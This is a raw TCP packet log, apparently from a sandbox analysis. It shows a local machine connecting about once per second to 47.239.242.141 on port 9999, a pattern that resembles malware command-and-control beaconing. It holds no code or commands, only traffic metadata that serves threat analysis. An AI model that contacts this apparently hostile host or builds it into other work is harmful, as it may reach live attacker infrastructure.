Oct 8, 2024 04:20:26.025753975 CEST	9999	54190	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:26.025783062 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.025804996 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.025937080 CEST	54190	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.030646086 CEST	9999	54190	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:26.140404940 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.145396948 CEST	9999	54197	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:26.145467997 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.145644903 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:26.150393963 CEST	9999	54197	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:27.038786888 CEST	9999	54197	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:27.038849115 CEST	9999	54197	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:27.038896084 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.039444923 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.041879892 CEST	54197	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.046755075 CEST	9999	54197	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:27.164402962 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.169415951 CEST	9999	54203	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:27.173429966 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.175864935 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:27.180733919 CEST	9999	54203	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:28.096061945 CEST	9999	54203	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:28.096112967 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.096473932 CEST	9999	54203	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:28.096520901 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.202406883 CEST	54203	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.202927113 CEST	54209	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.207844019 CEST	9999	54203	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:28.208214045 CEST	9999	54209	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:28.208415031 CEST	54209	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.208415985 CEST	54209	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:28.214163065 CEST	9999	54209	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:29.113360882 CEST	9999	54209	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:29.113462925 CEST	9999	54209	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:29.113684893 CEST	54209	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:29.113684893 CEST	54209	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:29.118629932 CEST	9999	54209	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:29.220999002 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:29.226070881 CEST	9999	54220	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:29.227109909 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:29.227272987 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:29.233263969 CEST	9999	54220	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:30.151227951 CEST	9999	54220	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:30.151365042 CEST	9999	54220	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:30.151407957 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.151407957 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.266781092 CEST	54220	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.267016888 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.271750927 CEST	9999	54220	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:30.272044897 CEST	9999	54226	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:30.272109032 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.272250891 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:30.277276039 CEST	9999	54226	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:31.172035933 CEST	9999	54226	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:31.172357082 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.172389984 CEST	9999	54226	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:31.172619104 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.283868074 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.283941031 CEST	54226	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.289576054 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:31.289592028 CEST	9999	54226	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:31.291549921 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.295429945 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:31.301167011 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033373117 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033402920 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033417940 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033477068 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033515930 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.033515930 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.033521891 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.033601999 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.033601999 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.033601999 CEST	54235	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.043538094 CEST	9999	54235	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.140182972 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.144926071 CEST	9999	54241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:33.149013996 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.149013996 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:33.153892040 CEST	9999	54241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:34.066191912 CEST	9999	54241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:34.066251040 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.066306114 CEST	9999	54241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:34.066354036 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.066390991 CEST	54241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.071163893 CEST	9999	54241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:34.172889948 CEST	54249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.178608894 CEST	9999	54249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:34.178658962 CEST	54249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.178838015 CEST	54249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:34.184726000 CEST	9999	54249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:35.119440079 CEST	9999	54249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:35.119566917 CEST	9999	54249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:35.119688034 CEST	54249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:35.120083094 CEST	54249	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:35.125300884 CEST	9999	54249	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:35.235037088 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:35.240003109 CEST	9999	54255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:35.240576029 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:35.240993023 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:35.245965958 CEST	9999	54255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:36.157541037 CEST	9999	54255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:36.157577991 CEST	9999	54255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:36.157630920 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.157630920 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.157737970 CEST	54255	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.163320065 CEST	9999	54255	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:36.265597105 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.270497084 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:36.270564079 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.270685911 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:36.275456905 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.248905897 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.248966932 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.248994112 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.249000072 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.249027014 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.249072075 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.249222994 CEST	54264	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.254102945 CEST	9999	54264	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.358916998 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.363749027 CEST	9999	54271	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:37.363858938 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.364061117 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:37.368906021 CEST	9999	54271	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:38.252597094 CEST	9999	54271	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:38.252660036 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.252667904 CEST	9999	54271	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:38.252712011 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.252738953 CEST	54271	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.257536888 CEST	9999	54271	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:38.358937979 CEST	54278	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.363960981 CEST	9999	54278	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:38.364037991 CEST	54278	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.364214897 CEST	54278	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:38.369277954 CEST	9999	54278	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:39.286218882 CEST	9999	54278	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:39.286304951 CEST	9999	54278	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:39.286417007 CEST	54278	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:39.286469936 CEST	54278	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:39.291290045 CEST	9999	54278	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:39.391429901 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:39.396339893 CEST	9999	54287	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:39.396465063 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:39.396574020 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:39.401365995 CEST	9999	54287	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:40.310410976 CEST	9999	54287	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:40.310453892 CEST	9999	54287	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:40.310461998 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.310517073 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.310580015 CEST	54287	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.315408945 CEST	9999	54287	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:40.420922041 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.426146984 CEST	9999	54295	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:40.426213026 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.426351070 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:40.431458950 CEST	9999	54295	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:41.338881969 CEST	9999	54295	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:41.338962078 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.339091063 CEST	9999	54295	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:41.339448929 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.452703953 CEST	54301	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.452712059 CEST	54295	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.457550049 CEST	9999	54301	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:41.457560062 CEST	9999	54295	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:41.457639933 CEST	54301	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.457995892 CEST	54301	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:41.462769985 CEST	9999	54301	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:42.353708982 CEST	9999	54301	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:42.353722095 CEST	9999	54301	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:42.353769064 CEST	54301	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:42.353859901 CEST	54301	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:42.358606100 CEST	9999	54301	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:42.468381882 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:42.473136902 CEST	9999	54310	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:42.473203897 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:42.473335028 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:42.478127956 CEST	9999	54310	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:43.404686928 CEST	9999	54310	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:43.404702902 CEST	9999	54310	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:43.404767990 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.404767990 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.404824018 CEST	54310	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.409605026 CEST	9999	54310	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:43.515157938 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.520097017 CEST	9999	54318	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:43.520319939 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.520415068 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:43.525182962 CEST	9999	54318	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:44.437933922 CEST	9999	54318	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:44.437992096 CEST	9999	54318	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:44.438144922 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.438144922 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.462779999 CEST	54318	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.467900038 CEST	9999	54318	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:44.598778963 CEST	54319	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.603724957 CEST	9999	54319	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:44.603805065 CEST	54319	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.610392094 CEST	54319	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:44.615199089 CEST	9999	54319	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:45.498665094 CEST	9999	54319	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:45.498775959 CEST	9999	54319	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:45.498909950 CEST	54319	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:45.498984098 CEST	54319	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:45.503755093 CEST	9999	54319	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:45.610945940 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:45.615835905 CEST	9999	54320	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:45.615935087 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:45.616106987 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:45.621153116 CEST	9999	54320	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:46.553930998 CEST	9999	54320	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:46.553987026 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.554064989 CEST	9999	54320	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:46.554106951 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.671463013 CEST	54320	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.671971083 CEST	54321	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.676378012 CEST	9999	54320	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:46.676901102 CEST	9999	54321	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:46.677090883 CEST	54321	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.677090883 CEST	54321	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:46.681983948 CEST	9999	54321	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:47.566606045 CEST	9999	54321	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:47.566642046 CEST	9999	54321	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:47.566853046 CEST	54321	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:47.567260981 CEST	54321	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:47.572072983 CEST	9999	54321	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:47.671343088 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:47.676302910 CEST	9999	54322	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:47.679228067 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:47.679522038 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:47.684397936 CEST	9999	54322	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:48.571050882 CEST	9999	54322	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:48.571070910 CEST	9999	54322	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:48.571227074 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.571228027 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.571331024 CEST	54322	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.576417923 CEST	9999	54322	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:48.687509060 CEST	54323	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.692428112 CEST	9999	54323	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:48.692487955 CEST	54323	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.692610025 CEST	54323	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:48.697381020 CEST	9999	54323	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:49.615943909 CEST	9999	54323	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:49.615964890 CEST	9999	54323	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:49.617058992 CEST	54323	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:49.617567062 CEST	54323	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:49.622348070 CEST	9999	54323	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:49.736881971 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:49.741851091 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:49.742034912 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:49.744889021 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:49.749686956 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.690726042 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.690749884 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.690762043 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.690783978 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.690809965 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.691006899 CEST	54324	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.695874929 CEST	9999	54324	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.796926975 CEST	54325	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.801939964 CEST	9999	54325	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:50.802128077 CEST	54325	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.802128077 CEST	54325	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:50.807518005 CEST	9999	54325	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:51.704575062 CEST	9999	54325	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:51.704596043 CEST	9999	54325	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:51.704868078 CEST	54325	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:51.704868078 CEST	54325	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:51.709876060 CEST	9999	54325	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:51.811873913 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:51.816900015 CEST	9999	54326	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:51.819318056 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:51.819643974 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:51.824465990 CEST	9999	54326	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:52.708815098 CEST	9999	54326	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:52.708869934 CEST	9999	54326	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:52.709000111 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.709000111 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.709000111 CEST	54326	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.714818001 CEST	9999	54326	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:52.811517954 CEST	54327	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.816726923 CEST	9999	54327	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:52.816865921 CEST	54327	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.817348003 CEST	54327	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:52.822253942 CEST	9999	54327	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:53.733972073 CEST	9999	54327	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:53.734061003 CEST	9999	54327	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:53.737040043 CEST	54327	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:53.737040043 CEST	54327	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:53.741859913 CEST	9999	54327	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:53.843930006 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:53.848818064 CEST	9999	54328	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:53.848988056 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:53.849035978 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:53.853851080 CEST	9999	54328	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:54.761821985 CEST	9999	54328	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:54.761872053 CEST	9999	54328	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:54.761898994 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.761943102 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.762015104 CEST	54328	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.766880989 CEST	9999	54328	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:54.876921892 CEST	54329	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.881807089 CEST	9999	54329	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:54.885085106 CEST	54329	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.885085106 CEST	54329	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:54.889889002 CEST	9999	54329	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:55.797046900 CEST	9999	54329	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:55.797072887 CEST	9999	54329	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:55.800991058 CEST	54329	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:55.983355045 CEST	54329	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:55.988188982 CEST	9999	54329	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:56.097395897 CEST	54330	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:56.102292061 CEST	9999	54330	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:56.102355003 CEST	54330	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:56.105184078 CEST	54330	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:56.109956980 CEST	9999	54330	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:57.012485027 CEST	9999	54330	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:57.012556076 CEST	9999	54330	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:57.012911081 CEST	54330	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:57.012990952 CEST	54330	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:57.017776966 CEST	9999	54330	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:57.124898911 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:57.129884958 CEST	9999	54331	47.239.242.141	192.168.2.4
Oct 8, 2024 04:20:57.130069971 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:57.130069971 CEST	54331	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:20:57.134866953 CEST	9999	54331	47.239.242.141	192.168.2.4
